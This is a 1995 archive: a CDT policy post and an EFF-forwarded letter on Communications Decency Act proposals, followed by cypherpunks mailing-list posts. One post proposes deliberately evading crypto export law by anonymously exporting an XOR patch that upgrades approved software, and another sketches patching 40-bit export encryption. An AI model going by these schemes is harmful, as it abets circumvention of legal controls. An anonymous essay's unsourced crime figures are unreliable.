6. Protect online service providers from vicarious liability for
   transmitting their subscribers messages or for merely providing
   access to the Internet.

III. BACKGROUND ON THE "HARMFUL TO MINORS" STANDARD

White's proposal would prohibit sending material that is "harmful to
minors" directly to a minor, as well as prohibit the display of material
that is "harmful to minors" unless good faith, reasonable steps to
labile and enable others to block access to such material.

Harmful to minors is an intermediate standard between indecency and
obscenity. It is essentially material that is obscene to a minor. It has
been used in 48 state statutes and has been ruled constitutional by the
Supreme Court. It is defined as follows:

"'harmful to minors' means any communications or material that is
obscene or that:

   (a)  taken as a whole, and with respect to minors, appeals to a
          prurient interest in nudity, sex, or excretion;

   (b)  depicts, represents, or describes in a patently offensive way
        with respect to what is suitable for minors, ultimate sexual
        acts, normal or perverted, actual or simulated, sado-masochistic
        acts or abuse; or lewd exhibition of the genitals, pubic area,
        buttocks, or post-putertal female breasts; and

   (c)  taken as a whole, lacks serious literary, artistic, political,
        or scientific value for minors.

Materials that would be acceptable under this standard include the text
of Catcher in the Rye, Ulysses, the use of the "7 dirty words" in
context, and works of art which contain nudity. These same materials
would be prohibited under an "indecency" standard.

NEXT STEPS

Once the House conferees vote on Wednesday, the full House/Senate
conference committee will consider the issue. If the House conferees
accept the White proposal, there will be additional opportunities to
clarify and strengthen the proposal. However, if Hyde prevails, the
entire battle will be lost.

In addition to the "cyberporn issue", there are several other issues in
the telecommunications bill which the conferees much resolve, including
competition in the long distance market, cable rate regulation, and
universal service, to name a few. The Republican leadership has
reportedly instructed the conferees to finish all remaining issues this
week and to have the final bill ready for the full House and Senate
during the week of December 11. It is not clear whether this deadline
can actually be met given the range of unresolved issues, but the House
and Senate leadership appear committed to the timeline.

CDT will keep you informed of developments on this issue as they occur.
We will also post the text of the White proposal on our net-censorship
web page as soon as a final copy is available (we expect it to be posted
by Tuesday afternoon 12/5).

For more information, visit CDT's net-censorship issues page:

  http://www.cdt.org/cda.html

------------------------------------------------------------------------
---
(2) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMAITON

1. SUBSCRIBING TO THE LIST

To subscibe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page
URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 31                                        12/4/95
-----------------------------------------------------------------------

   
     _________________________________________________________________
   
   Return to the Net-Censorship Issues Page
   Return to the CDT Home Page

Below is an open letter to Internet users from Rep. Rick White (R-WA),
co-sponsor of the Cox/Wyden/White anti-censorship legislation, discussing
his new proposed amendment to the telecom bill, which is now in joint
conference committee.  As most of you are aware, several amendments to
to the bill, many of them conflicting, are to be "reconciled", with the
result, constitutional or otherwise, being sent to both houses of
Congress for (likely) final approval, and thence to the President for his
(at least fairly likely) signature.  Among those amendments are several
patently unconstitutional proposals, from the original Exon/Coats
"Communications Decency Act", to a new, even more censorious amendment
supported by the Christian Coalition, Ed Meese, and other representatives
of the "religious right".

EFF does not endorse any of the proposals that have been floated in
the conference committee.  We take the position that no content-control
legislation should be passed. EFF remains committed to mounting
constitutional challenges in court to any such legislation that passes.


[begin forward]

From: REPWHITE@HR.HOUSE.GOV
Date: 04 Dec 1995 22:07:22 EST
Subject: An open letter from Rep. Rick White to the Internet Communi
To: mech@EFF.ORG

Please forward this message to interested members of the Internet community.

Thank you.

Congressman Rick White

--

AN OPEN LETTER TO THE INTERNET COMMUNITY

December 4, 1995

To members of the Internet Community and Concerned Citizens:

     For the past several months, I have closely followed the online debate
over Congressional attempts to impose content controls on the Internet.  Your
phone calls, letters, and email were instrumental in convincing 420 of my
House colleagues to support the Cox/Wyden/White "Internet Freedom and Family
Empowerment Act."

     As you may know, on Wednesday, December 6th, the Telecommunications
Reform Legislation Conference Committee, of which I am a member, will choose
between two competing proposals:  one offered by my colleague, House
Judiciary Committee Chairman Henry Hyde (R-IL), and my own proposal.  I
believe that the decision we reach on Wednesday will have a significant
impact on the future of the Internet.  While many of us who use the Internet
feel that Congress should steer clear of any new regulation of the Internet
and online information services, the reality is that proponents of more
severe restrictions on online content have been successful in convincing many
in Congress that new regulations are necessary.

     The conference committee is charged with reconciling several competing
approaches to addressing children's access to objectionable material online.
 In June, the Senate, by an overwhelming majority passed the Exon/Coats
"Communications Decency Act."  In August, the House passed the
Cox/Wyden/White "Internet Freedom and Family Empowerment Act," which
emphasized parental empowerment over government content regulations.  At the
same time, the House also approved a new indecency crime sponsored by
Chairman Hyde.

     As an avid Internet user and a strong believer in the enormous potential
of cyberspace to educate, expand commercial opportunities, and create jobs,
I have developed an alternative proposal that I expect to offer to conferees
on Wednesday.  My proposal will ensure freedom of speech and encourage the
development of technological tools to help parents prevent their children
from accessing inappropriate material online.  It would also prohibit the
Federal Communications Commission from controlling online content and from
meddling in the underlying technologies of the net.

     In addition, my proposal will create tough penalties for those few bad
actors who send truly objectionable material directly to minors or display
such material.  However, those who make good faith, reasonable efforts to
label content and enable it to be blocked or filtered by parental control
technologies (such as the PICS standards currently being developed by MIT and
the World Wide Web Consortium) would be immune from prosecution.

     Briefly, my proposal:

*  Substitutes the narrow, "harmful to minors" standard instead of the
   broad, vague, and constitutionally suspect "indecency" standard.
   The "harmful to minors" standard refers to material that is sexually
   explicit and, taken as a whole, lacks serious literary, artistic,
   political or scientific value for minors.

*  Prohibits the Federal Government from regulating online content or
   from having oversight over the underlying technologies of the net.

*  Would prohibit displaying material that is "harmful to minors," but
   create immunity for those who make good faith and reasonable efforts
   to implement parental empowerment technologies that enable screening
   of unwanted content.

*  Would not impose liability on online service providers merely for
   transmitting the messages of their users.

     At this time, the only option for the conference committee is to choose
between the White proposal or the Hyde substitute amendment.  As the only
option that minimizes government intrusion on freedom of speech, relies on
parents to make their own choices about what material comes into their homes,
and prevents the FCC from imposing regulations on online content, I hope you,
as well as my colleagues in Congress, will agree with my approach.

                              Sincerely,
                                   /s/
                              Rick White
                              Member of Congress

*************************************************
http://www.house.gov/white/welcome.html
repwhite@hr.house.gov
*************************************************

[end forward]



--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist    </HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Wed, 6 Dec 95 17:57:24 PST
To: Alex Strasheim <cp@proust.suba.com>
Subject: My conception of the ideal encryption tool for the masses
In-Reply-To: <199512060918.DAA06957@proust.suba.com>
Message-ID: <199512070158.SAA11862@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Alex Strasheim <cp@proust.suba.com> wrote:
>
> I don't know what blancw was getting at, but I'll take up his side of the
> argument.  Can good security really be automated so well that people will
> have it without thinking about it? 
> 
> I create accounts at an ISP, and 90% of the people who walk in the door
> pick terrible passpwords, even after listening to a little speech about
> what makes a good one.  I'd be willing to bet that more than half the
> people using PGP have passphrases that would fall quickly to a dictionary
> attack. 


Yes, but even if your PGP passphrase is "pass", using
PGP gives you excellent security against anyone who
can't get access to your secret key.


I envision "Joe User" security as a pocket-computer 
That has very limited capability.  Basically it can
input data (but not executable code!), put Joe's 
authentication-stamp (a.k.a. "signature", although 
that's a misnomer) on that data, and output it.


It only does this in response to some kind of
authentication-action from Joe himself.  Perhaps he
inputs a 4-digit PIN.  (It should be designed so that
he can keep the PIN-input-device out of sight, say in
his pocket, while using it.)  Furthermore it should
have an amnesia function where brute-forcing the PIN
fails (possibly wiping the secret key) and a duress
code PIN which fakes normal operation.  (Possibly the 
duress code replaces all the incoming data with "HELP 
I'M BEING HELD UNDER DURESS!" before stamping it and
outputting it, then wipes the secret key and continues
to operate in fake mode.)


And of course its hardware should be "tamper-resistant"
for whatever that's worth.


I guess it should have a one-time function (burnable
ROM or whatever) which generates the secret key so that
Joe can generate the key himself rather than having it
done at the factory.  It would be nice if Joe could
make a back-up of his secret key, but I don't see
anyway to do that without weakening the protection on
it.


Does this sound like something Joe could learn how to
use properly, and trust enough to store a few hundred 
dollars in?  He can choose his PIN himself and his 
duress PIN can be a variation of the normal one.  One
problem is that Joe can't necessarily tell what
information is being fed into his "stamper" to be
stamped.  Possibly it could have an LCD display for
that purpose...



Hopefully it is apparent what kind of use this tool can
be put to.  For example, Joe picks up a a carton of
milk at the grocery store, the store's cash register 
submits a bill for $2.00 to Joe's stamper, which stamps 
it, and Joe leaves.  The grocer can submit Joe's signed
IOU to Joe's bank at his/her leisure later.



Variations on this theme.  The main issue is how Joe 
can keep track of what information his is stamping.



Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMZKHPWZSllhfG25AQEbSgP9HOYLQtCuEiok/JCvxHnq1Xxvx7aeXZH9
8OaC0GPEPFFNSnjerLTcvkbrn04JjHNBC10eMx3I8/jSTB6817M+M8+aTzqC44rH
m2krfLCOMPXXHejDJgzPn/OlsLRKzi1HgeiHphpL1NGoRyNk+mKzBmq59EbvOqeF
aSrF6QuEEpw=
=rHnb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Dec 95 16:36:48 PST
To: cypherpunks@toad.com
Subject: SEQ_uel
Message-ID: <199512070037.TAA07593@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, Dec 1, 1995.

   "The Evolution of Molecular Computation." By Willem
   Stemmer. Comments on the limitations of Leonard Adleman's
   and Richard Lipton's DNA-computation research compared to
   the utility of sequence evolution computation.

      Although DNA sequencing of the selected solutions poses
      a practical problem for molecular computation, this
      drawback does not exist for computation with genetic
      algorithms or for in vitro evolution or computer
      simulations of natural evolution, called artificial
      life. Sequence evolution appears to be a useful general
      tool for solving many complex problems, whether the
      solution is a number, sequence, program, or structure.


   SEQ_uel  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Dec 95 20:19:17 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNXBk-000930C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:36 PM 12/6/95 -0800, you wrote:
>>>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>>>module in a file external to the  main program.
>>>>2.  Get export approval for this program.
>>>>3.  Write a module which replaces the encryption file, increasing key size
>>>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>>>PGP, etc.)
>>>>4.  Ship that new module with the old software to US customers.
>>>>Naturally, that new module will "leak," so anybody who buys the old
>
>Tim May replied
>>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>>the authorities and are not a bypass of the crypto export laws.
>
>I had interpreted the suggestion differently - rather than a system with 
>user-accessible crypto hooks, the manufacturer could ship a binary patch
>upgrade for US customers to install.  The internal design would presumably
>have crypto hooks (i.e. subroutine calls); they can't ban that.
>
>Of course, if you follow this strategy, get export approval for version 1.0,
>and ship the US-only patch as 1.1, getting export approval for version 2.0
>may be a shade more difficult...


And you get the prize because YOU guessed right! Sorry if I wasn't more clear.  

My premise:  Every program of length "n" bytes is simply an XOR away from
every OTHER program of length "n" bytes.  If one of those programs is the
export-allowed program and the other is the export-forbidden program, the
XOR file is the difference between them.   The "only" problem is to generate
the "XOR" file and get it out of the country.  The "getting it out of the
country" part is easy and will presumably happen because somebody not known
to the company does it.  At that point, the only problem is authentication:
This can be done easily using existing PGP digital signatures.

Obviously, only one copy of the XOR file needs to be exported, at least per
revision.  It is arguable that the export of that XOR file is illegal; so be
it.  It would be exported by an unknown person, using an unknown method, and
uploaded anonymously to a foreign server, all without the knowledge,
cooperation, or approval of the company.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 18:26:14 PST
To: cypherpunks@toad.com
Subject: Re: unsuscribe
Message-ID: <aceb90f4000210048aa8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


First, Mary Rose wrote:
>unsuscribe


And then KLEMEN RAMOVES wrote:


plz..unsuscribe me..
klemen@lj

klemen@Lj
-oz.sik.si

I sanse a patern, a change in the Englash linguage that I seem to have mist.

Hmmhhh....


--Tiim Mae, Cyperponk


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 6 Dec 95 17:48:37 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <v02120d00acebf5584a6b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:
>>If the Exon Bill really does go into effect, and age limits on access are
>>imposed, I'll be looking for what we've always joked about: the
>>"Information Superhighway Driver's License."

To be perfectly honest, whenever I talked about this topic I wasn't joking.

Prepare to see "felony Internet access" on the books before long.




-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: German Santos Jaimes <germans@exodus.dgsca.unam.mx>
Date: Wed, 6 Dec 95 17:59:31 PST
To: KLEMEN RAMOVES <KLEMEN@lj-oz.sik.si>
Subject: unsuscribe
In-Reply-To: <01HYIAGKS0OI0006XT@arnes.si>
Message-ID: <Pine.SV4.3.91.951206195647.19448A-100000@exodus>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 6 Dec 95 20:22:42 PST
To: cypherpunks@toad.com
Subject: Re: [FYI] FBI Training Eastern European Police
Message-ID: <199512070422.UAA22589@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Del Torto wrote:


>   FBI School Teaches New Tricks to Old Enemies
      ...
>   In matching navy blue polo shirts, the students sat transfixed as
>   they watched slides showing the destruction of the Oklahoma City and
>   World Trade Center bombings.
> 
>   "God forbid you should ever have anything like this happen over
>   here," American instructor Ed Burwitz told his Central European
>   class, outfitted with headphones for simultaneous translation of the
>   lecture. "It is a tough task for any
>   freedom-loving country to prevent terrorism," he added.
      ...
>   The United States fronted $2.5 million to renovate the campus, which
>   includes a brand-new gym, classrooms, dormitories and one of
>   Hungary's few indoor tennis courts. The Hungarian government
>   contributed $500,000 to renovate the facility,
>   but the U.S. will pay the $3.5 million yearly cost to operate the
>   center, which is modeled after the law enforcement training center in
>   Quantico, Va.
>
>   Students from Hungary, Russia, Poland, the Czech Republic and other
>   Central and Eastern European nations attend ILEA's 8-week sessions,
>   the first of which began in April.
>
>   The idea is to help the Eastern Europeans with their burgeoning
>   crimes problems, as well as to foster cooperation on international
>   crime problems.

This sounds like a capital idea.  

I'm certain that the FBI and other law-enforcement officials might
also learn by living in a city where the East truly meets the West.

Budapest is a beautiful old city of bridges, not just literally but
figuratively.  It's where anyone in the world can find comfort.

Americans, French, German, Syrian ... all can use it for transit.

And the annual Grand Prix is one heck of a car race as well.  An
international grand-luxe congregation opportunity.  Burwitz probably
doesn't consider Budapest a hardship post.  Especially if he found
himself a shack up in the hills of Buda on Rose Hill.

>   "I'm amazed at the freedom of travel that is possible" after the
>   opening up of the Eastern nations, Burwitz said. But "that means
>   criminals can travel as well," he said, allowing them to traffic
>   drugs and contraband. "The more interaction we have with these
>   countries in law enforcement, the better it will be for emerging
>   democracies," Kaciban said.

If Burwitz is concerned with emerging democracies, he might profit
from reading some briefing papers, and leaving some of his
pre-conceptions at the door.  Especially, if he plans on getting full
value from his visit.  True bang for the buck, as it were.

Hungary has always been open to "free travel".  

That's why they had a Hilton and an Inter-Continental in Budapest.  In
fact, the "collapse" of the Berlin Wall -- which was missed by most
intelligence agencies -- was a direct result of free travel on the far
side of the "Iron Curtain".

There was always travel freedom within COMECON.  There had to be.
Truckers as an example traveled throughout the East.  And there were
always family vacations as well.  What was missing was a way to have
large population movements from East to West.  Migration.

Hungary solved that problem when it opened its border with its
historic ally-cum-subjugator, Austria.  Hungary's boldness allowed
East Germans -- skilled East Germans -- to exit in large number to
Austria during their ostensible "vacations" to Hungarian resorts.

They transited Austria to West Germany where they had guaranteed
citizenship, and were assured employment because of their skill-set.
This massive population flow of skilled workers is what ultimately
lead to East German collapse and the subsequent German re-unification.

It was Hungarian and Austrian policy co-operation that allowed Germany
to re-join its two halves.  A co-operation that flowed from an
extended period of Austrian investment in Hungarian enterprise.

(I guess Germany owes Hungary one for that.)  

But the "unification" does lead to some interesting problems, as the
non-migratory East German population -- the ones whose skills were not
as marketable;  or alternatively, those who had valuable skills but
were philosophically aligned with the old regime -- are absorbed into
the Western EU fabric. 

Assimilation can be a very difficult process when attempts are made to
integrate into the German economy those who choose _not_ to migrate
especially if they are either unfit for, or opposed to their
Liberators.  

Eliminating communism did not eliminate the communists.

If Burwitz gets briefed on some history, I'm sure that many things
will fall into context for him, and there will be a greater
understanding of the enemy that he's teaching people to fight.  It's
always good to understand the scope of a problem before you attack it.

That can only help with gaol achievement.

>   Organized crime is doubly damaging to the emerging nations, because
>   it undermines their economies, Kaciban said. Investors are naturally
>   reluctant to dump money into a nation if they believe there is
>   rampant corruption. 

I don't think that "investors" are ever reticent about exploiting
opportunities -- if they are in fact welcome to, and not locked 
out.  Unfortunately many opportunities are only extended by
invitation to a select group of friends and not to an open field.

This is true in Europe as well as anywhere in the world.  Politicians
as an example get access to certain opportunities -- Hillary Clinton's
futures investments, or the Canadian equivalent, Alberta Premier Ralph
Klein's wife's investment in Multi-Corp, as an example.

At it's extreme, Kaciban is correct, this can lead to rampant
corruption, something which is best prevented.  But that is not the
situation we are faced with in the East.  In the East, there is an
understanding that business is about relationships and understandings.

Working relationships.

Anyone that a firm would expect to have a contract with, isn't
probably someone you should be sharing a bed with -- as they say -- in
the first place.

>   Some teachings do not translate for the European
>   students. For example, there is no Russian RICO - the Racketeer
>   Influenced and Corrupt Organizations Act that is one of the strongest
>   American legal tools against organized crime.

Some teachings also probably don't translate well for the American
instructors.  Cultural differences and expectations, as an example,
which are born out of history.

While the idea of a Russian RICO is interesting, it's not overly
realistic.  RICO is meant for a region that has established rules of
engagement -- the breach of which calls for quick "rubber-hose"
justice to ensure the system continues to function.  RICO is best
reserved, in that sense for a litigious America, to make sure that
everyone remembers where their allegiance should lie.

It has very little applicability in a chaotic system.  Not only is
there nothing to "preserve" -- but it truly begs the question of who'd
administer a Russian RICO?  

You can't expect someone who's earning the equivalent of $50/month
not to supplement their official "pay".

>   Eastern European crime syndicates tend not to be based in crime
>   families, instructors said. And organized crime in Russia and Ukraine
>   is so much a part of the society, that it's hard to stop it, said Amy
>   O'Neil, a State Department official not involved in the ILEA.

Yep.  This is a very serious problem.  

Some circles have suggested that the Russian nationalist Zhirinovsky
is involved in some fashion in these syndicates; they've drawn a
parallel to Sinn Fein.

Others think that there is a utilization of KGB remnants (including
those former communists which have now been _absorbed_ into the
"unified" Germany, and continue to hold positions of power there).
They believe that these sympathizers wish to restore and rebuild
Mother Russia and the old social state.  

Some believe that these elements -- those that have a political /
nationalistic allegiance -- are very friendly with the Eastern
European crime syndicates.  A reciprocal arrangement, if you will.

One thing is clear.  Whether or not any of the foregoing hold, or
whether or not this syndicate's motivations are capitalistic or
nationalistic -- their tentacles extend worldwide.  Not only through a
Moscow - St.Petersberg - Frankfurt - Brussels backbone, but even into
the heartland of the United States.

Hard to believe??

The FBI (I think) has identified about 220 "Eurasian" (mostly Russian)
gangs operating in 17 U.S. cities in 14 states.  And I believe they've
identified 5,700 crime gangs in the former Soviet Union (which is up
_significantly_ from the 785 identified in 1991).

The Russian Ministry of Internal Affairs has estimated that gangs in
the former USSR employ about 100,000 _full-time_ members and an
estimated 3,000,000 part-timers.

These gangs' tentacles even by FBI estimates extend worldwide.  

The FBI (again) said that Russian gangs are entrenched in 29 foreign
countries and maintain contacts with nearly 100,000 criminal
enterprises worldwide ranging from illegal alien smuggling rings, and
drug gangs, through the child prostitution trade in China and
Southeast Asia.

If these enterprises are even somewhat loosely organized -- as Sinn
Fein was -- then they probably have access to good crypto.  Very good
crypto.  There can be no question of that.

The belief that this syndicate is composed solely of thugs is actually
contra-indicated.

The ISSA (Information Systems Security Association) has suggested that
these transnational gangs employ out of work or underemployed Russian
scientists, mathematicians and computer experts, who earn as _little_ as
$50 to $100 a month in their legitimate jobs because of inflation of
Russia's currency.  

The ISSA, has written that these specialist scientists penetrate the
Internet's global web of more than 60,000 computer networks.  Radicals
even suggest that this group is unique in having access to their own
constellations and communications systems -- but I personally think
that could only be civilian speculation.

This group is well organized, well financed and has a breadth and
depth of manpower that has never before been confronted.

The idea that those Russians who now winter at St. Tropez and who have
joined Monte Carlo cafe society must simply be very effective
"capitalists" doesn't float.  They are true natural talents who
understand the financial system and its networks -- personal networks,
financial networks, and silicon networks.

The former Russian bankers who managed the countries Gold & Oil Sales,
the ones who achieved understandings with De Beer's, the ones who
managed Soviet international FOREX operations, and the ones who
visited with Armand Hammer, and learned from him personally, probably
had some sophistication in these matters.  

They've "dirtied" their hands with matters of Western finance, before.

If they or their lieutenants have donated their talents to these
enterprises, then Burwitz truly has his work cut out for him in
educating and training at the new FBI School.  

He's not just facing some Caspian caviar smugglers.  He's up against
some of the finest talent available.

>   Both students and teachers said there was a remarkable similarity,
>   however, in the use of evidence and investigatory tools among the
>   countries. Eastern Europeans are very familiar with the use of DNA
>   testing, for example, to identify suspects, although they don't
>   always have the money to do it, Burwitzsaid."There are different
>   orders of laws between the U.S. and here," said a Czech student who
>   would identify himself only as Milan. "But essentially, we have the
>   same methods of investigation."

A far worse scenario can come forward than Milan's.

Let's suppose that the other side not only has complete familiarity
with your arsenal of investigatory and evidentiary tools, but also has
a superior knowledge of your own systems and their vulnerabilities, --
a knowledge that is superior to that you yourself possess.

Let's assume that while you were building your systems, hard and soft
systems, the other side has been studying them -- looking for holes
and vulnerabilities, and quietly documenting them.  

Taking an action, no different than your very own study of their
systems, actually.

Now lets suppose that you destroy the other side's system, and cause
economic collapse, social chaos, and national humiliation, while
preserving your own system.  An attempt at supremacy through "other
means".  Have you not invited a retaliatory attack?  

Some might suggest that you have ...

Not that Eastern syndicate elements might wish to see the disease
which has effected post-Soviet Russia propagate.  A share in the 
taste of it.  They're too busy tasting what was promised to them 
by the Voice of America and living the life of a model 
capitalist -- one of the characters from Dynasty.

Groups such as the Congress of Russian Communities, and the decorated
Afghan war hero, Gen. Alexander Lebed -- who Yeltsin asked to resign
as commander of the 14th Russian Army following Lebed's criticism of
the Kremlin -- certainly would have nothing to gain by retaliating in
kind to the disease introduced into the Motherland.

Striking at the state's head, clearly didn't solve this problem.
The essential "talent" has simply re-organized into a new structure,
one which is not under any central command or control hierarchy or
authority.  Simple chaotic self-interests organizing and emerging.

Certainly upcoming Presidential Elections in June and November won't
play a part in this.

"I treat the word democracy with respect," fourty-five year-old Lebed 
told the newspaper Segodya recently.  "But I am sure democracy will 
not be established within my lifetime.  Our country is such that 
democracy will have to be built by authoritarian methods."

Luckily, for all of us, President Boris Yeltsin is firmly in control.  

He has little to fear.  Some people might be looking for a parallel to
MacArthur / Truman, in this instance.  But I personally wouldn't hang
my hat on that hope.

Lebed certainly wouldn't subscribe to Douglas MacArthur's statement
after he was relieved of command in the Far East, in 1951, when he
said, "I find in existence a new and heretofore unknown and dangerous
concept that the members of our armed forces owe primary allegiance or
loyalty to those who temporarily exercise the authority of the
Executive Branch of the Government rather than to the country and its
constitution which they swore to defend.  No proposition could be more
dangerous."

The April/May ISSA Password had this to say.

     "Unless something is done by law enforcement and private security
     agencies on a global scale to deter these Russian criminals, they
     will be looting banks, corporations, and government agencies of
     billions of dollars -- without using guns or the traditional
     methods.  Their modus operandi will be to rely solely on computer
     keyboards and the Internet.

     In an article published in the February 6, 1995, issue of the
     "Washington Times," international security expert and former
     Times editor-in-chief Arnaud de Borchgrave said: (sic)
     "Cyberspace detectives" report that financial thefts by Russian
     organized crime hackers on the Internet last year exceeded an
     estimated $5 Billion in the United States alone.

     Furthermore, he reports that about $300 million in untraceable
     computer transfers have vanished during the past two months
     (Jan/Feb 95) from banks and securities firms based on the East
     and West coasts of the U.S.

I think in February (1995), the CIA and the National Security Agency
(NSA) warned in a joint security report that, "The security of
information systems and networks is the major security challenge of
this decade and possibly the next century."

Burwitz faces a challenge.  If you face talent, information, money,
and organization, while you can't even get your ducks lined up, if you
can't maintain team discipline, then you might pretty well surrender.

You've already ceded much of the high ground, as Burwitz can probably
attest.

To prevent the accusation of being a "red-baiter" perhaps, I might say
that Mao Tse Tung, himself once noted:

   "Some people are intelligent in knowing themselves but stupid in
   knowing their opponents, and others the other way round; neither
   kind can solve the problem of learning and applying the laws of war."

And to close, a return to de Borchgrave, who according to ISSA
Password, wrote:

     "And it's not juvenile hackers who are committing these crimes.
     "Those doing it for the sheer pleasure of causing chaos on the
     net -- usually very young super-hackers -- have rapidly become
     the minority," one cyber detective told de Borchgrave.
     "Transnational crime gangs operating on several continents at
     almost the speed of light are now the main problems."



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@boston.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 6 Dec 95 17:25:52 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <199512070125.UAA16598@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512062229.RAA16714@universe.digex.net>,
Scott Brickner <sjb@universe.digex.net> wrote:
> 
> I agree.  It does bring to mind an idea, though.  Netscape builds an
> exportable system by choosing a random 128 bit number and then just
> including 88 bits of it in plaintext.
> 
> This means one of two things.  Either there's a field which holds the
> "key", but the export version stores 88 bits plain + 40 bits cipher,
> and knows this structure, or there's a field which holds the 128 bit
> enciphered key, and a second field which holds the 88 bits of plaintext
> key.
> 

It's the former (in SSL v2.0).

I looked into this, because the former version can be vulnerable to
related-key attacks, if not done right.  SSL v2.0 does it right.
(In particular, SSL v2.0 hashes both the 88 bit salt + 40 bit secret
to get all the cipher keys.)

> 
> In the former, the patch would be more significant, but still possible.
> You'd disable the "write the plain" part and extend the "decode the
> cipher" part to decode all 128 bits --- probably just a loop test.
> 

(And you'd have to change the cipher type from RC4-40 to RC4-128.)

Or write a local proxy to convert from RC4-40-salted to RC4-128.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMZCbSoZzwIn1bdtAQF9xAGAqkg5VzChucF3FasK2pYVxg1D5F3lsnSP
CFWsp+MbXKqTe71iznBvtg246xWPLohe
=XM3W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KHARY PENEBAKER <kharyp@earthlink.net>
Date: Wed, 6 Dec 95 18:29:57 PST
To: cypherpunks@toad.com
Subject: list
Message-ID: <199512070228.SAA19607@iceland.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


put me on the list






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 6 Dec 95 12:30:13 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <aceb12f4150210045ba8@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951206202150.5522A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    well, there goes the neighborhood.

    guess I better clean up my www front page which meets the Exon rules on 
indeceny, pisses on ITAR, and is probably seditious as well. might as 
well get a start on it before the eager beavers hemorrhage!

    the House contingent were all of the Exon persuasion to begin with and
subject to threats by the Christian Right. The real test is whether the
full House will sign on --a real test on Newt's professed 'Freedom of the
Net' policy!  If Newt keeps his resolve, can he again raise the 424-4
